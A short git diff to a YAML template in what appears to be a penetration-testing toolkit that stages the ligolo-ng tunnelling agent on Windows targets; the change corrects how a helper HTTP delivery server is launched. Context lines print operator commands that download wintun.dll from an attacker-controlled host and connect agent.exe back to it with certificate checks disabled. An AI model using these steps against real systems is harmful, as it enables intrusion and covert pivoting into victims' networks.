--- a/src/profi/templates/scripts/deliver-windows-ligolo-ng-including-setup.yaml
+++ b/src/profi/templates/scripts/deliver-windows-ligolo-ng-including-setup.yaml
@@ -23,4 +23,4 @@ content: |
   echo 'Preperation 3 (Deliver wintun.dll): iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/wintun.dll -Outfile <%=$(esh variables/delivery_path_windows)%>\wintun.dll'; \
   echo "Connect agent to proxy: <%=$(esh variables/delivery_path_windows)%>\agent.exe -ignore-cert -connect <%=$(esh variables/attacker_ip)%>:11601"; \
   echo '================================================================'; \
-  python -m <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
